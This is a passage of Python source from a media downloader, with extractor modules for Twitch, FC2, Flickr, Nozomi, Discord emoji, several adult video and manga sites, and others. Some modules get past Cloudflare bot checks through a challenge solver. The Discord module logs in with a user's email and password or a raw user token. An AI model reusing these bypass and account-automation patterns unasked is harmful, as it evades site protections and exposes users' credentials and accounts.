'_download_info', None) if _download_info is not None: vod_id = ex._match_id(url) info = _download_info(vod_id) print_(info) if 'HTTPError 403' in str(e): raise errors.LoginRequired() raise return info class Video: _url = None def __init__(self, url, session, cw, live=False): self.url = LazyUrl(url, self.get, self) self.session = session self.cw = cw self._live = live @try_n(4) def get(self, url): print_ = get_print(self.cw) session = self.session if self._url: return self._url info = extract_info(url, self.cw) self.artist = info.get('creator') or info.get('uploader') #4953, #5031 def print_video(video): #print_(video)# print_('{}[{}] [{}] [{}] {}'.format('LIVE ', video['format_id'], video.get('height'), video.get('tbr'), video['url'])) videos = [video for video in info['formats'] if video.get('height')] videos = sorted(videos, key=lambda video:(video.get('height', 0), video.get('tbr', 0)), reverse=True) for video in videos: print_video(video) for video in videos: if video.get('height', 0) <= get_resolution(): #3723 video_best = video break else: video_best = videos[-1] print_video(video) video = video_best['url'] ext = get_ext(video) id = info['display_id'] if self._live: self.title = info['description'] if utils.SD['twitch']['strip_ads']: video = M3u8_stream(video, n_thread=4, alter=alter, session=session) else: video = utils.LiveStream(video, headers=video_best.get('http_headers', {})) ext = '.mp4' else: self.title = info['title'] if ext.lower() == '.m3u8': video = M3u8_stream(video, n_thread=4, alter=alter, session=session) ext = '.mp4' self.filename = format_filename(self.title, id, ext, artist=self.artist, live=self._live) self.url_thumb = info['thumbnail'] self._url = video return self._url def get_streamer_name(url): session = Session() session.purge('twitch') graphql_url = 'https://gql.twitch.tv/gql' headers = { 'Client-ID': 'kimne78kx3ncx6brgo4mv6wki5h1ko', 'Content-Type': 'application/json', } session.headers.update(headers) id = url.split('/')[3] payload = {'operationName': 'PlaybackAccessToken_Template', 'query': 'query PlaybackAccessToken_Template($login: String!, $isLive: Boolean!, $vodID: ID!, $isVod: Boolean!, $playerType: String!) { streamPlaybackAccessToken(channelName: $login, params: {platform: "web", playerBackend: "mediaplayer", playerType: $playerType}) @include(if: $isLive) { value signature authorization { isForbidden forbiddenReasonCode } __typename } videoPlaybackAccessToken(id: $vodID, params: {platform: "web", playerBackend: "mediaplayer", playerType: $playerType}) @include(if: $isVod) { value signature __typename }}', 'variables': {'isLive': True, 'login': id, 'isVod': False, 'vodID': '', 'playerType': 'site'}} r = session.post(graphql_url, json=payload) r.raise_for_status() data = r.json() value = json.loads(data['data']['streamPlaybackAccessToken']['value']) cid = value['channel_id'] utils.log(data) payload = [{"operationName":"EmotePicker_EmotePicker_UserSubscriptionProducts","variables":{"channelOwnerID":f"{cid}"},"extensions":{"persistedQuery":{"version":1,"sha256Hash":"71b5f829a4576d53b714c01d3176f192cbd0b14973eb1c3d0ee23d5d1b78fd7e"}}}] r = session.post(graphql_url, json=payload) r.raise_for_status() data = r.json() return data[0]['data']['user']['displayName'] class Live_twitch(utils.Live): type = 'twitch' @classmethod def is_live(cls, url): return Downloader.get('twitch').get_filter(url) == 'live' @classmethod def check_live(cls, url, info=None): if info is not None: try: info['title'] = get_streamer_name(url) except Exception as e: utils.log(print_error(e)) ydl = ytdl.YoutubeDL(type='twitch') try: ydl.extract_info(url) return True except Exception as e: print(e) return False File: src/extractor/fc2_downloader.py import downloader import ree as re from utils import urljoin, Downloader, format_filename, Soup, LazyUrl, get_print, Session from m3u8_tools import M3u8_stream from io import BytesIO PATTERN_ID = r'/content/([^/]+)' class Downloader_fc2(Downloader): type = 'fc2' single = True URLS = ['video.fc2.com'] ACCEPT_COOKIES = [r'(.*\.)?fc2\.com'] @classmethod def fix_url(cls, url): if not re.match(r'https?://.+', url, re.I): url = f'https://video.fc2.com/content/{url}' return url @classmethod def key_id(cls, url): return re.find(PATTERN_ID, url) or url def read(self): self.session = Session() self.session.cookies.set('_ac', '1', domain='.video.fc2.com') info = get_info(self.url, self.session, self.cw) video = info['videos'][0] self.urls.append(video.url) f = BytesIO() downloader.download(video.url_thumb, referer=self.url, buffer=f) self.setIcon(f) self.title = info['title'] class Video: def __init__(self, url, url_thumb, referer, title, id_, session): self._url = url self.url = LazyUrl(referer, self.get, self) self.filename = format_filename(title, id_, '.mp4') self.url_thumb = url_thumb self.session = session def get(self, referer): ext = downloader.get_ext(self._url, session=self.session, referer=referer) if ext == '.m3u8': video = M3u8_stream(self._url, referer=referer, session=self.session, n_thread=4) else: video = self._url return video def get_info(url, session, cw=None): print_ = get_print(cw) info = {'videos': []} html = downloader.read_html(url, session=session) soup = Soup(html) info['title'] = soup.find('h2', class_='videoCnt_title').text.strip() id_ = re.find(PATTERN_ID, url, err='no id') print_('id: {}'.format(id_)) token = re.find(r'''window.FC2VideoObject.push\(\[['"]ae['"], *['"](.+?)['"]''', html, err='no token') print_('token: {}'.format(token)) url_api = 'https://video.fc2.com/api/v3/videoplaylist/{}?sh=1&fs=0'.format(id_) hdr = { 'X-FC2-Video-Access-Token': token, } data = downloader.read_json(url_api, url, session=session, headers=hdr) pl = data['playlist'] url_video = urljoin(url, pl.get('hq') or pl.get('nq') or pl['sample']) #3784 url_thumb = soup.find('meta', {'property':'og:image'})['content'] video = Video(url_video, url_thumb, url, info['title'], id_, session) info['videos'].append(video) return info File: src/extractor/flickr_downloader.py from utils import Downloader, File, Session, urljoin, get_ext, clean_title, Soup, limits import utils import ree as re import downloader import clf2 from timee import time TIMEOUT = 10 class File_flickr(File): type = 'flickr' format = '[date] id' @limits(1) def get(self): url = self['referer'] soup = downloader.read_soup(url, session=self.session) img = soup.find('meta', {'property': 'og:image'})['content'] date = re.find(r'"dateCreated":{"data":"([0-9]+)"', soup.html, err='no date') ext = get_ext(img) d = { 'date': int(date), 'id': re.find(r'/photos/[^/]+/([0-9]+)', url, err='no id'), } return {'url': img, 'name': utils.format('flickr', d, ext)} class Downloader_flickr(Downloader): type = 'flickr' URLS = ['flickr.com'] MAX_CORE = 4 ACCEPT_COOKIES = [r'(.*\.)?flickr\.com'] def init(self): self.session = Session() @classmethod def fix_url(cls, url): url = url.replace('flickr.com/people/', 'flickr.com/photos/') uid = re.find(r'flickr.com/photos/([^/]+)', url) if uid: url = f'https://www.flickr.com/photos/{uid}' return url def read(self): tab = ''.join(self.url.split('/')[3:4]) if tab == 'photos': uid = self.url.split('/')[4] title = None ids = set() c = 0 ct = None p_max = 1 def f(html, browser=None): nonlocal title, c, ct, p_max soup = Soup(html) browser.runJavaScript('window.scrollTo(0,document.body.scrollHeight);') for a in soup.findAll('a'): href = a.get('href') or '' href = urljoin(self.url, href) p_max = max(p_max, int(re.find(rf'flickr.com/photos/{uid}/page([0-9]+)', href) or 0)) id_ = re.find(rf'/photos/{uid}/([0-9]+)', href) if not id_: continue if id_ in ids: continue ids.add(id_) file = File_flickr({'referer': href}) self.urls.append(file) if ids: uname = soup.h1.text.strip() title = f'{clean_title(uname)} (flickr_{uid})' self.cw.setTitle(f'{title} - {len(ids)}') if c == len(ids): if not ct: ct = time() dt = time() - ct if dt > TIMEOUT: return True else: ct = None c = len(ids) p = 1 while p <= p_max: url = f'https://www.flickr.com/photos/{uid}/page{p}' self.print_(url) clf2.solve(url, session=self.session, f=f) p += 1 self.title = title else: raise NotImplementedError(tab) File: src/extractor/v2ph_downloader.py #coding:utf8 import downloader from utils import get_ext, LazyUrl, Downloader, try_n, clean_title, get_print, print_error, limits import ree as re from translator import tr_ import errors import clf2 def setPage(url, p): url = url.split('?')[0] if p > 1: url += '?page={}'.format(p) return url def getPage(url): p = re.find('page=([0-9]+)', url) return int(p or 1) class Image: def __init__(self, url, referer, p): self._url = url self.url = LazyUrl(referer, self.get, self) ext = get_ext(url) self.filename = '{:04}{}'.format(p, ext) @limits(.25) def get(self, _): return self._url class Downloader_v2ph(Downloader): type = 'v2ph' URLS = ['v2ph.com/album/'] MAX_CORE = 4 MAX_PARALLEL = 1 display_name = 'V2PH' ACCEPT_COOKIES = [r'(.*\.)?v2ph\.com'] def init(self): self.session = clf2.solve(self.url)['session'] @classmethod def fix_url(cls, url): return url.split('?')[0] def read(self): info = get_info(self.url, self.session) for img in get_imgs(self.url, self.session, info['title'], self.cw): self.urls.append(img.url) self.title = clean_title(info['title']) @try_n(2) def get_info(url, session): soup = read_soup(url, session) info = {} info['title'] = soup.find('h1').text.strip() return info @try_n(4) @limits(5) def read_soup(url, session): return downloader.read_soup(url, session=session) def get_imgs(url, session, title, cw=None): print_ = get_print(cw) imgs = [] for p in range(1, 1001): url = setPage(url, p) print_(url) try: soup = read_soup(url, session) except Exception as e: if p > 1: print_(print_error(e)) cw.showCookie() #6774 cw.showLogin('https://www.v2ph.com/login', None, None) break else: raise e view = soup.find('div', class_='photos-list') if view is None: if p == 1: raise errors.LoginRequired() else: break # Guest user for img in view.findAll('img'): img = img.attrs['data-src'] img = Image(img, url, len(imgs)) imgs.append(img) pgn = soup.find('ul', class_='pagination') ps = [getPage(a.attrs['href']) for a in pgn.findAll('a')] if pgn else [] if not ps or p >= max(ps): print('max p') break msg = '{} {} ({} / {})'.format(tr_('읽는 중...'), title, p, max(ps)) if cw: cw.setTitle(msg) else: print(msg) return imgs File: src/extractor/nozomi_downloader.py import downloader from urllib.parse import quote from io import BytesIO from utils import Downloader, query_url, get_ext, clean_title, check_alive, lock, get_print, get_max_range, File, Session, limits import errors from translator import tr_ import utils import os class File_nozomi(File): type = 'nozomi' format = 'idpage?' def get(self): infos = [] for p, img in enumerate(read_post(self['id'], self['referer'], self.session, self.cw)): url = img['url'] d = { 'id': img['id'], 'page?': f'_p{p}' if p else '', } filename = utils.format('nozomi', d, get_ext(url)) info = {'url': url, 'name': filename, 'referer': img['referer']} infos.append(info) return infos @limits(.25) def read_post(id, referer, session, cw): print_ = get_print(cw) check_alive(cw) # https://j.nozomi.la/nozomi.js s_id = str(id) url_post = 'https://j.nozomi.la/post/{}/{}/{}.json'.format(s_id[-1], s_id[-3:-1], s_id) try: j = downloader.read_json(url_post, referer, session=session) except Exception as e: print_(f'{id}: {e}') return [] #5989 imgs = [] for url in j['imageurls']: did = url['dataid'] if j.get('is_video'): #5754 cdn = 'v' ext = url['type'] else: cdn = 'g' if j.get('type') == 'gif' else 'w' ext = 'gif' if url.get('type') == 'gif' else 'webp' url = 'https://{}.nozomi.la/{}/{}/{}.{}'.format(cdn, did[-1], did[-3:-1], did, ext) #5340 img = {'id': id, 'url': url, 'referer': f'https://nozomi.la/post/{id}.html'} imgs.append(img) return imgs class Downloader_nozomi(Downloader): type = 'nozomi' URLS = ['nozomi.la'] display_name = 'Nozomi.la' MAX_CORE = 15 ACC_MTIME = True ACCEPT_COOKIES = [r'(.*\.)?nozomi\.la'] def init(self): self.session = Session() @classmethod def fix_url(cls, url): return url.split('#')[0] @property def name(self): qs = query_url(self.url) name = qs['q'][0] if self._popular: name += ' - Popular' return clean_title(name) def read(self): if '/post/' in self.url: raise errors.Invalid(tr_('개별 다운로드는 지원하지 않습니다: {}').format(self.url)) self._popular = 'search-Popular.' in self.url self.title = '{} {}'.format(tr_('읽는 중...'), self.name) qs = query_url(self.url) q = qs['q'][0] ids = get_ids_multi(q, self._popular, self.session, self.cw) self.print_(f'ids: {len(ids)}') max_pid = get_max_range(self.cw) def foo(id, p): d = { 'id': id, 'page?': f'_p{p}' if p else '', } filename_guess_base = utils.format('nozomi', d, '.webp') return os.path.join(utils.dir(self.type, self.name, self.cw), filename_guess_base) for id in ids: if os.path.isfile(foo(id, 0)): p = 0 while True: filename_guess = foo(id, p) if not os.path.isfile(filename_guess): break self.urls.append(filename_guess) p += 1 else: file = File_nozomi({'id': id, 'url': f'https://nozomi.la/post/{id}.html', 'referer': self.url}) self.urls.append(file) if len(self.urls) >= max_pid: break self.title = self.name @lock def get_ids(q, popular, session, cw): check_alive(cw) if q is None: if popular: url_api = 'https://j.nozomi.la/index-Popular.nozomi' else: url_api = 'https://j.nozomi.la/index.nozomi' else: q = q.replace('/', '') #5146 if popular: url_api = 'https://j.nozomi.la/nozomi/popular/{}-Popular.nozomi'.format(quote(q)) else: url_api = 'https://j.nozomi.la/nozomi/{}.nozomi'.format(quote(q)) #print_(url_api) f = BytesIO() downloader.download(url_api, 'https://nozomi.la/', session=session, buffer=f) data = f.read() ids = [] for i in range(0, len(data), 4): crop = data[i:i+4] id = crop[0]*16777216 + crop[1]*65536 + crop[2]*256 + crop[3] ids.append(id) return ids def get_ids_multi(q, popular, session, cw=None): print_ = get_print(cw) max_pid = get_max_range(cw) qs = q.split(' ') qs_pos = [q for q in qs if not q.startswith('-')] qs_neg = [q[1:] for q in qs if q.startswith('-')] q = qs_pos[0] if qs_pos else None ids = get_ids(q, popular, session, cw) print_('{}: {}'.format(q, len(ids))) # Positive for q in qs_pos[1:]: ids_ = get_ids(q, popular, session, cw) set_ids_ = set(ids_) ids_old = ids ids = [] for id in ids_old: if id in set_ids_: ids.append(id) print_('{}: {} ({})'.format(q, len(ids_), len(ids))) # Negative for q in qs_neg: ids_ = get_ids(q, popular, session, cw) set_ids_ = set(ids_) ids_old = ids ids = [] for id in ids_old: if id not in set_ids_: ids.append(id) print_('-{}: {} ({})'.format(q, len(ids_), len(ids))) return ids[:max_pid] File: src/extractor/discord_emoji_downloader.py # coding: UTF-8 # title: Discord 서버 커스텀 이모지 다운로드 # author: SaidBySolo """ MIT License Copyright (c) 2020 SaidBySolo Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ from utils import Downloader, clean_title import requests import errors class DownloaderDiscordEmoji(Downloader): type = "discord" def init(self): pass def read(self): token_guild_id_list = self.url.split( "/" ) # 값을 어떻게 받을지 몰라서 일단 나눴어요. discord_이메일/비밀번호/서버아이디 또는 discord_토큰/서버아이디 이런식으로 받게 해놨어요. if len(token_guild_id_list) == 2: token = token_guild_id_list[0] guild_id = token_guild_id_list[1] elif len(token_guild_id_list) == 3: email = token_guild_id_list[0] password = token_guild_id_list[1] guild_id = token_guild_id_list[2] response = self.post_account_info(email, password) account_info = response.json() if response.status_code == 400: if account_info.get("captcha_key"): raise errors.Invalid( "먼저 웹 또는 디스코드 앱에서 로그인하신후 캡차를 인증해주세요." ) # 메세지 박스 return하니까 멈춰서 raise로 해놨어요 else: raise errors.Invalid("이메일 또는 비밀번호가 잘못되었습니다. 확인후 다시 시도해주세요.") else: if not account_info["token"]: raise errors.Invalid("토큰을 받아오지 못했어요. 2단계인증을 사용중이신경우 토큰을 이용해 요청해주세요.") else: token = account_info["token"] else: raise errors.Invalid("인자값이 더 많이왔어요.") guild_info_response = self.get_emoji_list(token, int(guild_id)) # 토큰과 함께 get요청함 if guild_info_response.status_code != 200: raise errors.Invalid("정상적인 토큰이 아니거나 서버를 찾을수없어요. 맞는 토큰인지, 해당 서버에 접속해있는지 확인해주세요.") else: guild_info = guild_info_response.json() if guild_info["emojis"]: base_url = "https://cdn.discordapp.com/emojis/" for emoji in guild_info["emojis"]: # 이모지 리스트로 가져옴 if emoji["animated"] is True: # 만약 gif면 gif 다운로드 param = emoji["id"] + ".gif" else: # 아닐경우 png로 param = emoji["id"] + ".png" self.title = clean_title( f'{guild_info["name"]}({guild_info["id"]})' # 폴더 이름은 서버 이름, id ) self.urls.append(base_url + param + "?v=1") # 인자 합치기 else: raise errors.Invalid("해당 서버에는 이모지가 없어요") def get_emoji_list(self, token: str, guild_id: int) -> dict: response = requests.get( f"https://discordapp.com/api/v6/guilds/{guild_id}", headers={"Authorization": token}, ) if response.status_code == 401: response = requests.get( f"https://discordapp.com/api/v6/guilds/{guild_id}", headers={"Authorization": f"Bot {token}"}, ) return response def post_account_info(self, email: str, password: str) -> dict: response = requests.post( "https://discordapp.com/api/v8/auth/login", json={ "email": email, "password": password, "undelete": False, "captcha_key": None, "login_source": None, "gift_code_sku_id": None, }, ) return response File: src/extractor/xhamster_downloader.py import downloader, ree as re from utils import Downloader, Session, LazyUrl, get_print, get_ext, try_n, format_filename, clean_title, get_resolution from translator import tr_ from io import BytesIO import ytdl class Downloader_xhamster(Downloader): type = 'xhamster' __name = r'([^/]*\.)?(xhamster|xhwebsite|xhofficial|xhlocal|xhopen|xhtotal|megaxh|xhwide|xhtab|xhtime)([0-9]*)' #3881, #4332, #4826, #5029, #5696, #5893 URLS = [rf'regex:{__name}\.[a-z0-9]+/(videos|users|creators|photos/gallery)/'] single = True display_name = 'xHamster' ACCEPT_COOKIES = __name def init(self): if re.search(r'xhamsterlive[0-9]*\.', self.url): raise Exception('xHamsterLive') if not re.search(r'{}\.'.format(self.__name), self.url): self.url = 'https://xhamster.com/videos/{}'.format(self.url) self.session = Session('chrome') @classmethod def fix_url(cls, url): url = re.sub(r'(/users/[^/]+/videos)/[0-9]+', r'\1', url, 1) #5029 return url @classmethod def key_id(cls, url): return re.sub(cls.__name+r'\.[^/]+', 'domain', url, 1).replace('http://', 'https://') def read(self): cw = self.cw self.enableSegment(1024*1024//2) thumb = BytesIO() if '/users/' in self.url or '/creators/' in self.url: #6257 info = read_channel(self.url, self.session, cw) urls = info['urls'] videos = [Video(url) for url in urls] video = self.process_playlist(info['title'], videos) elif '/photos/gallery/' in self.url: info = read_gallery(self.url, self.session, cw) for img in info['imgs']: self.urls.append(img.url) self.single = False self.title = clean_title(info['title']) self.url = info['url'] self.disableSegment() return else: video = Video(self.url) video.url() self.urls.append(video.url) self.title = video.title downloader.download(video.info['thumbnail'], buffer=thumb) self.setIcon(thumb) class Video: _url = None def __init__(self, url): #url = downloader.real_url(url) self.url = LazyUrl(url, self.get, self) @try_n(2) def get(self, url): if self._url is None: self.info = get_info(url) self.title = self.info['title'] id = self.info['id'] #4773 fs = self.info['formats'] res = max(get_resolution(), min(f['height'] for f in fs)) fs = [f for f in fs if f['height'] <= res] video_best = fs[-1] self._url = video_best['url'] ext = get_ext(self._url) self.filename = format_filename(self.title, id, ext) if isinstance(self._url, str) and 'referer=force' in self._url.lower(): self._referer = self._url else: self._referer = url return self._url, self._referer def get_info(url): #6318 info = {} ydl = ytdl.YoutubeDL() d = ydl.extract_info(url) info['title'] = d['title'] info['id'] = d['id'] info['thumbnail'] = d['thumbnail'] fs = [] for f in d['formats']: if f['protocol'] != 'https': continue f = {'url': f['url'], 'height': f['height']} fs.append(f) fs = sorted(fs, key=lambda f: f['height']) info['formats'] = fs return info def read_page(type_, username, p, session, cw): print_ = get_print(cw) if type_ == 'users': url = f'https://xhamster.com/users/{username}/videos/{p}' elif type_ == 'creators': url = f'https://xhamster.com/creators/{username}/exclusive/{p}' else: raise NotImplementedError(type_) print_(url) n = 4 for try_ in range(n): try: soup = downloader.read_soup(url, session=session) items = soup.findAll('div', class_='thumb-list__item') if not items and try_ < n-1: continue break except Exception as e: e_ = e print(e) else: if p == 1: raise e_ else: return [] return items def read_channel(url, session, cw=None): type_, username = re.find(r'/(users|creators)/([^/]+)', url, err='no username') info = {} soup = downloader.read_soup(url, session=session) title = (soup.find('div', class_='user-name') or soup.find('h1')).text.strip() info['title'] = '[Channel] {}'.format(title) urls = [] urls_set = set() for p in range(1, 101): items = read_page(type_, username, p, session, cw) if not items: print('no items') break for item in items: if item.find('span', class_='thumb-image-container__status-text'): #2858 continue url = item.a.attrs['href'] if url in urls_set: print('duplicate:', url) continue urls_set.add(url) urls.append(url) s = '{} {} - {}'.format(tr_('읽는 중...'), info['title'], len(urls)) if cw: cw.setTitle(s) else: print(s) info['urls'] = urls return info class Image: def __init__(self, url, id, referer): self.id = id self._url = url self.url = LazyUrl(referer, self.get, self) def get(self, referer): url = self._url ext = get_ext(url) self.filename = '{}{}'.format(self.id, ext) return url def setPage(url, p): url = url.strip('/') c = url.split('/photos/gallery/')[1].count('/') if c: url = '/'.join(url.split('/')[:-1]) if p > 1: url += '/{}'.format(p) return url def read_gallery(url, session, cw=None): print_ = get_print(cw) info = {} soup = downloader.read_soup(url, session=session) h1 = soup.find('h1') if h1.find('a'): url = h1.find('a')['href'] return read_gallery(url, session, cw) info['title'] = h1.text.strip() info['url'] = setPage(url, 1) imgs = [] ids = set() for p in range(1, 101): print_('p: {}'.format(p)) url = setPage(url, p) soup = downloader.read_soup(url, session=session) view = soup.find('div', id='photo-slider') photos = view.findAll('a', id=lambda id: id and id.startswith('photo-')) if not photos: print_('no photos') break for photo in photos: img = photo['href'] id = photo['id'].split('photo-')[1] referer = url if id in ids: print('duplicate:', id) continue ids.add(id) img = Image(img, id, referer) imgs.append(img) info['imgs'] = imgs return info File: src/extractor/nhentai_com_downloader.py #coding:utf8 import downloader import ree as re from utils import urljoin, LazyUrl, Downloader, try_n, join, json import os class Downloader_nhentai_com(Downloader): type = 'nhentai_com' URLS = [r'regex:https?://nhentai.com'] MAX_CORE = 16 display_name = 'nhentai.com' ACCEPT_COOKIES = [r'(.*\.)?nhentai\.com'] def init(self): self.info = get_info(self.url) self.url = self.info['url'] @classmethod def key_id(cls, url): url = url.lower() return re.find(r'/comic/([^/?]+)', url) or url def read(self): info = self.info artist = join(info['artists']) self.artist = artist if info['artists'] else None group = join(info['groups']) lang = info['lang'] or 'N/A' series = info['seriess'][0] if info['seriess'] else 'N/A' title = self.format_title(info['type'], info['id'], info['title'], artist, group, series, lang) for img in info['imgs']: self.urls.append(img.url) self.title = title @LazyUrl.register class LazyUrl_nhentai_com(LazyUrl): type = 'nhentai_com' def dump(self): referer = self._url url = self.image.url_img return { 'referer': referer, 'url': url, 'p': self.image.p, } @classmethod def load(cls, data): referer = data['referer'] url = data['url'] img = Image(referer, url, data['p']) return img.url class Image: def __init__(self, url_page, url_img, p): self.p = p self.referer = url_page self.filename = os.path.basename(url_img) self.url_img = url_img self.url = LazyUrl_nhentai_com(url_page, lambda _: self.url_img, self) @try_n(4) def get_info(url): url = downloader.real_url(url) q = re.find(r'/comic/([^/?]+)', url) url_api = 'https://nhentai.com/api/comics/{}'.format(q) data_raw = downloader.read_html(url_api, url) data = json.loads(data_raw) url_api = 'https://nhentai.com/api/comics/{}/images'.format(q) data_raw = downloader.read_html(url_api, url) data_images = json.loads(data_raw) info = {} info['url'] = url info['id'] = int(data['id']) info['type'] = data['category']['name'] info['title'] = data['title'] info['artists'] = [x['name'] for x in data['artists']] info['groups'] = [x['name'] for x in data['groups']] info['seriess'] = [x['name'] for x in data['parodies']] info['lang'] = data['language']['name'] imgs = [] for img in data_images['images']: img = urljoin(url, img['source_url']) img = Image(url, img, len(imgs)) imgs.append(img) info['imgs'] = imgs return info File: src/extractor/xvideo_downloader.py import downloader from utils import Downloader, Soup, LazyUrl, urljoin, format_filename, Session, get_ext, get_print, get_max_range, html_unescape, try_n, limits, json from io import BytesIO import ree as re from m3u8_tools import playlist2stream from translator import tr_ from timee import sleep CHANNEL_PATTERN = r'/(profiles|[^/]*channels)/([0-9a-zA-Z_-]+)' def get_id(url): url = url.lower() if '/prof-video-click/' in url: return url.split('/prof-video-click/')[1].split('/')[2] return re.find(r'xvideos[0-9]*\.[^/]+/video([0-9]+)', url, err='no id') class Video: _url = None def __init__(self, url_page): url_page = Downloader_xvideo.fix_url(url_page) self.url = LazyUrl(url_page, self.get, self) def get(self, url_page): if not self._url: self._get(url_page) return self._url @try_n(4) @limits(2) def _get(self, url_page): id = get_id(url_page) html = downloader.read_html(url_page) soup = Soup(html) self.title = html_unescape(soup.find('title').text).replace('- XVIDEOS.COM', '').strip() url = re.find(r'''.setVideoHLS\(['"](.+?)['"]\)''', html) or re.find(r'''.setVideoUrlHigh\(['"](.+?)['"]\)''', html) or re.find(r'''.setVideoUrlLow\(['"](.+?)['"]\)''', html) #https://www.xvideos.com/video65390539/party_night if not url: raise Exception('no video url') ext = get_ext(url) if ext.lower() == '.m3u8': url = playlist2stream(url, n_thread=5) #4773 self.url_thumb = soup.find('meta', {'property': 'og:image'}).attrs['content'] self.filename = format_filename(self.title, id, '.mp4') self._url= url @property def thumb(self): self.url() f = BytesIO() downloader.download(self.url_thumb, buffer=f) return f class Downloader_xvideo(Downloader): type = 'xvideo' URLS = [r'regex:[./]xvideos[0-9]*\.(com|in|es)'] single = True display_name = 'XVideos' ACCEPT_COOKIES = [r'(.*\.)?xvideos[0-9]*\.(com|in|es)'] def init(self): if 'xvideos.' in self.url.lower(): self.url = self.url.replace('http://', 'https://') else: self.url = 'https://www.xvideos.com/{}'.format(self.url) @classmethod def fix_url(cls, url): url = re.sub(r'[^/]*xvideos[0-9]*\.[^/]+', 'www.xvideos.com', url).replace('http://', 'https://') url = url.replace('/THUMBNUM/', '/') return url @classmethod def key_id(cls, url): res = re.find(CHANNEL_PATTERN, url) if res: return '_'.join(res) return url def read(self): res = re.find(CHANNEL_PATTERN, self.url) if res: header, username = res info = read_channel(self.url, self.cw) videos = [Video(url) for url in info['urls']] video = self.process_playlist('[Channel] {}'.format(info['name']), videos) else: video = Video(self.url) video.url() self.title = video.title self.urls.append(video.url) self.setIcon(video.thumb) def read_channel(url_page, cw=None): print_ = get_print(cw) res = re.find(CHANNEL_PATTERN, url_page) if res is None: raise Exception('Not channel') header, username = res print(header, username) max_pid = get_max_range(cw) info = {} info['header'] = header info['username'] = username session = Session() urls = [] ids = set() for p in range(100): url_api = urljoin(url_page, '/{}/{}/videos/best/{}'.format(header, username, p)) print_(url_api) r = session.post(url_api) data = json.loads(r.text) videos = data.get('videos') #4530 if not videos: print_('empty') break for video in videos: id_ = video['id'] if id_ in ids: print_('duplicate: {}'.format(id_)) continue ids.add(id_) info['name'] = video['pn'] urls.append(urljoin(url_page, video['u'])) if len(urls) >= max_pid: break n = data['nb_videos'] s = '{} {} - {}'.format(tr_('읽는 중...'), info['name'], len(urls)) if cw: cw.setTitle(s) else: print(s) if len(ids) >= n: break sleep(1, cw) if not urls: raise Exception('no videos') info['urls'] = urls[:max_pid] return info File: src/extractor/mrm_downloader.py #coding:utf8 from utils import Soup, urljoin, LazyUrl, Downloader, try_n, get_print, clean_title, get_ext, check_alive from translator import tr_ import ree as re import clf2# class Image: def __init__(self, url, p, page, cw): self.cw = cw ext = get_ext(url) self.filename = '{:04}{}'.format(p, ext) if page.title is not None: self.filename = '{}/{}'.format(page.title, self.filename) self._url = url self.url = LazyUrl(page.url, self.get, self) def get(self, _): return self._url#'tmp://' + clf2.download(self._url, cw=self.cw) class Page: def __init__(self, title, url, soup=None): self.title = clean_title(title) self.url = url self.soup = soup class Downloader_mrm(Downloader): type = 'mrm' URLS = ['myreadingmanga.info'] _soup = None MAX_CORE = 4 display_name = 'MyReadingManga' ACCEPT_COOKIES = [r'(.*\.)?myreadingmanga\.info'] def init(self): self.session = get_session(self.url, self.cw) @classmethod def fix_url(cls, url): return re.find('https?://myreadingmanga.info/[^/]+', url, err='err') @property def soup(self): if self._soup is None: for try_ in range(8): try: html = read_html(self.url, session=self.session, cw=self.cw) break except Exception as e: e_ = e self.print_(e) else: raise e_ self._soup = Soup(html) return self._soup @property def name(self): title = get_title(self.soup) return title def read(self): self.title = '읽는 중... {}'.format(self.name) imgs = get_imgs(self.url, self.soup, self.session, self.cw) for img in imgs: self.urls.append(img.url) self.title = self.name def get_title(soup): title = soup.find('h1', class_='entry-title').text.strip() title = fix_title(title) title = clean_title(title) return title def get_imgs(url, soup=None, session=None, cw=None): if soup is None: html = read_html(url, session=session, cw=cw) soup = Soup(html) title = get_title(soup) pagination = soup.find('div', class_='pagination') if pagination is None: page = Page(None, url, soup) imgs = get_imgs_page(page, session=session, cw=cw) else: pages = get_pages(url, soup, session=session) imgs = [] for i, page in enumerate(pages): check_alive(cw) s = '{} {} / {} ({} / {})'.format(tr_('읽는 중...'), title, page.title, i+1, len(pages)) if cw: cw.setTitle(s) else: print(s) imgs += get_imgs_page(page, session=session, cw=cw) if not imgs: raise Exception('no imgs') return imgs def get_pages(url, soup=None, session=None): if soup is None: html = read_html(url, session=session, cw=None) soup = Soup(html) pagination = soup.find('div', class_='pagination') pages = [] hrefs = set() for a in pagination.findAll('a'): href = a.attrs.get('href', '') href = urljoin(url, href) if not href.startswith(url): print('not match', href) continue while href.endswith('/'): href = href[:-1] if href in hrefs: print('duplicate', href) continue hrefs.add(href) text = a.text.strip() page = Page(text, href) pages.append(page) if url not in hrefs: page = Page('1', url, soup) pages.insert(0, page) return pages @try_n(4) def get_imgs_page(page, session=None, cw=None): url = page.url soup = page.soup if soup is None: html = read_html(url, session=session, cw=None) soup = Soup(html) page.soup = soup view = soup.find('div', class_='entry-content') imgs = [] for img in view.findAll('img'): img = img.attrs.get('data-lazy-src') or img.attrs.get('data-src') if img is None: continue img = urljoin(url, img) img = Image(img, len(imgs), page, cw) imgs.append(img) print(page.title, len(imgs), page.url) return imgs def fix_title(title): title = re.sub(r'\(?[^()]*?c\.[^() ]+\)?', '', title) while ' ' in title: title = title.replace(' ', ' ') return title def read_html(url, session, cw): ## html = downloader.read_html(url, session=session) ## soup = Soup(html) ## ## cf = soup.find('div', class_='cf-browser-verification') ## if cf is None: ## return html r = clf2.solve(url, cw=cw, session=session) return r['html'] @try_n(4) def get_session(url, cw=None): print_ = get_print(cw) ## html = downloader.read_html(url) ## soup = Soup(html) ## ## cf = soup.find('div', class_='cf-browser-verification') ## if cf is None: ## print_('no cf protection') ## return None print_('cf protection') r = 